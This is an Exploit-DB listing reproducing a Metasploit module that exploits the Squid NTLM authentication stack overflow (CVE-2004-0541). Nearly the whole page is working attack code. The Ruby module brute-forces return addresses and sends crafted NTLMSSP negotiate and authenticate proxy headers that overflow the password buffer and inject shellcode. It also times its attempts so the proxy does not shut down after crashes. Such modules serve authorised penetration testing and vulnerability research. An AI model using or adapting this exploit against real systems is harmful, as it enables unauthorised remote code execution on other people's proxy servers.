Squid – NTLM (Authenticated) Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2010-04-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16847/
  • ##
    # $Id: squid_ntlm_authenticate.rb 9179 2010-04-30 08:40:19Z jduck $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    
    require 'msf/core'
    
    
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = GreatRanking
    
    	include Msf::Exploit::Brute
    	include Msf::Exploit::Remote::Tcp
    
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Squid NTLM Authenticate Overflow',
    			'Description'=> %q{
    					This is an exploit for Squid\'s NTLM authenticate overflow
    				(libntlmssp.c). Due to improper bounds checking in
    				ntlm_check_auth, it is possible to overflow the 'pass'
    				variable on the stack with user controlled data of a user
    				defined length.Props to iDEFENSE for the advisory.
    			},
    			'Author' => 'skape',
    			'Version'=> '$Revision: 9179 $',
    			'References' =>
    				[
    					[ 'CVE', '2004-0541'],
    					[ 'OSVDB', '6791'],
    					[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
    					[ 'BID', '10500'],
    				],
    			'Privileged' => false,
    			'Payload'=>
    				{
    					'Space'=> 256,
    					'MinNops'=> 16,
    					'Prepend'=> "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
    					'PrependEncoder' => "\x83\xec\x7f",
    
    				},
    			'Targets'=>
    				[
    					[ 'Linux Bruteforce',
    						{
    							'Platform' => 'linux',
    							'Bruteforce' =>
    								{
    									'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
    									'Stop'=> { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
    									'Step'=> 0
    								}
    						},
    					],
    				],
    			'DisclosureDate' => 'Jun 8 2004',
    			'DefaultTarget'=> 0))
    
    		register_advanced_options(
    			[
    				# We must wait 15 seconds between each attempt so as to prevent
    				# squid from exiting completely after 5 crashes.
    				OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
    			], self.class)
    	end
    
    	def brute_exploit(addresses)
    		site = "http://" + rand_text_alpha(rand(128)) + ".com"
    
    		print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
    		connect
    
    		trasnmit_negotiate(site)
    		transmit_authenticate(site, addresses)
    
    		handler
    		disconnect
    	end
    
    	def trasnmit_negotiate(site)
    		negotiate=
    			"NTLMSSP\x00"+ # NTLMSSP identifier
    			"\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE
    			"\x07\x00\xb2\x07" + # flags
    			"\x01\x00\x09\x00" + # workgroup len/max (1)
    			"\x01\x00\x00\x00" + # workgroup offset(1)
    			"\x01\x00\x03\x00" + # workstation len/max (1)
    			"\x01\x00\x00\x00" # workstation offset(1)
    
    		print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
    		req =
    			"GET #{site} HTTP/1.1\r\n" +
    			"Proxy-Connection: Keep-Alive\r\n" +
    			"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
    			"\r\n"
    		sock.put(req)
    
    	end
    
    	def transmit_authenticate(site, addresses)
    		overflow =
    			rand_text_alphanumeric(0x20) +
    			[addresses['Ret']].pack('V') +
    			[addresses['Valid']].pack('V') +
    			"\xff\x00\x00\x00"
    		shellcode= payload.encoded
    		pass_len = [overflow.length + shellcode.length].pack('v')
    		authenticate =
    			"NTLMSSP\x00"+ # NTLMSSP identifier
    			"\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE
    			pass_len + pass_len+ # lanman response len/max
    			"\x38\x00\x00\x00" + # lanman response offset(56)
    			"\x01\x00\x01\x00" + # nt response len/max (1)
    			"\x01\x00\x00\x00" + # nt response offset(1)
    			"\x01\x00\x01\x00" + # domain name len/max (1)
    			"\x01\x00\x00\x00" + # domain name offset(1)
    			"\x01\x00\x01\x00" + # user name (1)
    			"\x01\x00\x00\x00" + # user name offset(1)
    			"\x00\x00\x00\x00" + # session key
    			"\x8b\x00\x00\x00" + # session key
    			"\x06\x82\x00\x02" + # flags
    			overflow + shellcode
    
    		print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
    		req =
    			"GET #{site} HTTP/1.1\r\n" +
    			"Proxy-Connection: Keep-Alive\r\n" +
    			"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
    			"\r\n"
    		sock.put(req)
    	end
    
    end